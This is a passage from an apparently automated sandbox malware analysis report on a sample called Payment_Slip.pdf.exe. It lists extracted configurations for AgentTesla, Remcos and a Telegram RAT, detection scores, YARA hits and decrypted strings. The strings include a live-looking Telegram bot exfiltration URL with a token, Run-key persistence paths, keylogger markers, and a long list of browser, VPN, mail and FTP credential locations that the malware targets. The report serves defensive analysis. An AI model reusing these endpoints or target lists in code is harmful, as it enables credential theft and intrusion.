"Keylog folder": "remcos", "Keylog file max size": "100"}
                              Source: 12.0.host.exe.240000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendMessage?chat_id=5559571239"}
                              Source: host.exe.4860.12.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendMessage"}
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeReversingLabs: Detection: 83%
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeReversingLabs: Detection: 83%
                              Source: C:\Users\user\AppData\Roaming\host.exeReversingLabs: Detection: 87%
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeReversingLabs: Detection: 50%
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeReversingLabs: Detection: 87%
                              Source: Payment_Slip.pdf.exeVirustotal: Detection: 45%Perma Link
                              Source: Payment_Slip.pdf.exeReversingLabs: Detection: 50%
                              Source: Yara matchFile source: 7.2.mHTmhPhJy.exe.416f180.4.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 7.2.mHTmhPhJy.exe.41e47a0.3.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 11.2.mHTmhPhJy.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.Payment_Slip.pdf.exe.3483d88.4.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.Payment_Slip.pdf.exe.340e768.3.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.0.dwn.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.2.dwn.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 11.2.mHTmhPhJy.exe.400000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 7.2.mHTmhPhJy.exe.41e47a0.3.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 7.2.mHTmhPhJy.exe.416f180.4.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.Payment_Slip.pdf.exe.3483d88.4.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.Payment_Slip.pdf.exe.340e768.3.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0000000B.00000002.1203872894.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000B.00000002.1205028524.0000000000BBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000005.00000002.3614974815.0000000002ECF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000005.00000002.3614283187.00000000013DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000011.00000002.1224623594.00000000005FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000011.00000000.1223302187.0000000000456000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000007.00000002.1251111243.000000000416F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000011.00000002.1224421328.0000000000456000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000005.00000002.3611370738.0000000001330000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.1187261780.000000000340E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: Payment_Slip.pdf.exe PID: 8060, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: Payment_Slip.pdf.exe PID: 7544, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: mHTmhPhJy.exe PID: 7856, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: mHTmhPhJy.exe PID: 5392, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: dwn.exe PID: 7300, type: MEMORYSTR
                              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\dwn.exe, type: DROPPED
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: /log.tmp
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: text/html
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: text/html
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: <br>[
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: yyyy-MM-dd HH:mm:ss
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: ]<br>
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: <br>
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: text/html
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: application/zip
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Time:
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: MM/dd/yyyy HH:mm:ss
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: <br>User Name:
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: <br>Computer Name:
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: <br>OSFullName:
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: <br>CPU:
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: <br>RAM:
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: <br>
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: IP Address:
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: <br>
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: <hr>
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: New
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: MM/dd/yyyy HH:mm:ss
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: IP Address:
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: true
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: https://api.ipify.org
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: true
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: true
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: true
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: false
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: true
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: false
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: https://api.telegram.org/bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: 5559571239
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: true
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: true
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: appdata
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: mykksg
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: mykksg.exe
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: mykksg
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: true
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: false
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: true
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Type
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: XCrOSR
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Software\Microsoft\Windows\CurrentVersion\Run
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: <br>
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: <hr>
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: <br>
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: <b>[
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: ]</b> (
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: )<br>
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: {BACK}
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: {ALT+TAB}
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: {ALT+F4}
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: {TAB}
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: {ESC}
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: {Win}
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: {CAPSLOCK}
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: {KEYUP}
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: {KEYDOWN}
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: {KEYLEFT}
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: {KEYRIGHT}
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: {DEL}
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: {END}
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: {HOME}
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: {Insert}
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: {NumLock}
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: {PageDown}
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: {PageUp}
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: {ENTER}
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: {F1}
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: {F2}
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: {F3}
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: {F4}
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: {F5}
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: {F6}
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: {F7}
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: {F8}
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: {F9}
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: {F10}
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: {F11}
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: {F12}
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: control
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: {CTRL}
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: &amp;
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: &lt;
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: &gt;
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: &quot;
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: <br><hr>Copied Text: <br>
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: <hr>
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: logins
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: IE/Edge
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Windows Secure Note
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: 3CCD5499-87A8-4B10-A215-608888DD3B55
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Windows Web Password Credential
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: 154E23D0-C644-4E6F-8CE6-5069272F999F
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Windows Credential Picker Protector
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Web Credentials
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Windows Credentials
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Windows Domain Certificate Credential
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Windows Domain Password Credential
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Windows Extended Credential
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: 00000000-0000-0000-0000-000000000000
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: SchemaId
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: pResourceElement
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: pIdentityElement
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: pPackageSid
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: pAuthenticatorElement
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: IE/Edge
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: UC Browser
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: UCBrowser\
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Login Data
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: journal
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: wow_logins
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Safari for Windows
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \Common Files\Apple\Apple Application Support\plutil.exe
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \Apple Computer\Preferences\keychain.plist
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: <array>
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: <dict>
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: <string>
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: </string>
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: <string>
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: </string>
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: <data>
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: </data>
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: -convert xml1 -s -o "
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \fixed_keychain.xml"
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \Microsoft\Credentials\
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \Microsoft\Credentials\
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \Microsoft\Credentials\
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \Microsoft\Credentials\
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \Microsoft\Protect\
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: credential
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: QQ Browser
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Tencent\QQBrowser\User Data
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \Default\EncryptedStorage
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Profile
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \EncryptedStorage
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: entries
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: category
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Password
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: str3
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: str2
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: blob0
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: password_value
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: IncrediMail
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: PopPassword
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: SmtpPassword
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Software\IncrediMail\Identities\
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \Accounts_New
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: PopPassword
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: SmtpPassword
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: SmtpServer
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: EmailAddress
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Eudora
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Software\Qualcomm\Eudora\CommandLine\
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: current
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Settings
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: SavePasswordText
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Settings
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: ReturnAddress
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Falkon Browser
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \falkon\profiles\
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: profiles.ini
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: startProfile=([A-z0-9\/\.\"]+)
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: profiles.ini
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \browsedata.db
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: autofill
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: ClawsMail
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \Claws-mail
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \clawsrc
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \clawsrc
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: passkey0
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: master_passphrase_salt=(.+)
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: master_passphrase_pbkdf2_rounds=(.+)
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \accountrc
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: smtp_server
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: address
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: account
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \passwordstorerc
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: {(.*),(.*)}(.*)
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Flock Browser
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: APPDATA
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \Flock\Browser\
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: signons3.txt
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: DynDns
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: ALLUSERSPROFILE
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Dyn\Updater\config.dyndns
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: username=
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: password=
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: https://account.dyn.com/
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: t6KzXhCh
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: ALLUSERSPROFILE
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Dyn\Updater\daemon.cfg
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: global
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: accounts
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: account.
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: username
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: account.
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: password
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Psi/Psi+
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: name
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: password
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Psi/Psi+
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: APPDATA
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \Psi\profiles
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: APPDATA
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \Psi+\profiles
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \accounts.xml
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \accounts.xml
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: OpenVPN
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Software\OpenVPN-GUI\configs
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Software\OpenVPN-GUI\configs
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Software\OpenVPN-GUI\configs\
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: username
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: auth-data
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: entropy
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: USERPROFILE
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \OpenVPN\config\
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: remote
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: remote
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: NordVPN
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: NordVPN
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: NordVpn.exe*
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: user.config
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: //setting[@name='Username']/value
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: //setting[@name='Password']/value
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: NordVPN
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Private Internet Access
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: %ProgramW6432%
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Private Internet Access\data
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: ProgramFiles(x86)
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \Private Internet Access\data
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \account.json
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: .*"username":"(.*?)"
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: .*"password":"(.*?)"
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Private Internet Access
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: privateinternetaccess.com
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: FileZilla
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: APPDATA
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \FileZilla\recentservers.xml
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: APPDATA
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \FileZilla\recentservers.xml
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: <Server>
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: <Host>
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: <Host>
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: </Host>
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: <Port>
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: </Port>
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: <User>
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: <User>
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: </User>
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: <Pass encoding="base64">
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: <Pass encoding="base64">
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: </Pass>
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: <Pass>
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: <Pass encoding="base64">
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: </Pass>
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: CoreFTP
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: SOFTWARE\FTPWare\COREFTP\Sites
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: User
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Host
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Port
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: hdfzpysvpzimorhk
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: WinSCP
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: HostName
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: UserName
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Password
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: PublicKeyFile
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: PortNumber
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: [PRIVATE KEY LOCATION: "{0}"]
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: WinSCP
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: ABCDEF
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Flash FXP
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: port
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: user
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: pass
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: quick.dat
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Sites.dat
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \FlashFXP\
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \FlashFXP\
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: yA36zA48dEhfrvghGRg57h5UlDv3
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: FTP Navigator
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: SystemDrive
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \FTP Navigator\Ftplist.txt
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Server
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Password
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: No Password
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: User
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: SmartFTP
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: APPDATA
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: SmartFTP\Client 2.0\Favorites\Quick Connect
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: WS_FTP
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: appdata
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Ipswitch\WS_FTP\Sites\ws_ftp.ini
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: HOST
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: PWD=
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: PWD=
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: FtpCommander
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: SystemDrive
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: SystemDrive
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \Program Files (x86)\FTP Commander\Ftplist.txt
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: SystemDrive
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \cftp\Ftplist.txt
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \VirtualStore\Program Files (x86)\FTP Commander\Ftplist.txt
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \VirtualStore\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: ;Password=
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: ;User=
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: ;Server=
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: ;Port=
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: ;Port=
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: ;Password=
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: ;User=
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: ;Anonymous=
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: FTPGetter
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \FTPGetter\servers.xml
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: <server>
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: <server_ip>
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: <server_ip>
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: </server_ip>
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: <server_port>
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: </server_port>
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: <server_user_name>
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: <server_user_name>
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: </server_user_name>
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: <server_user_password>
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: <server_user_password>
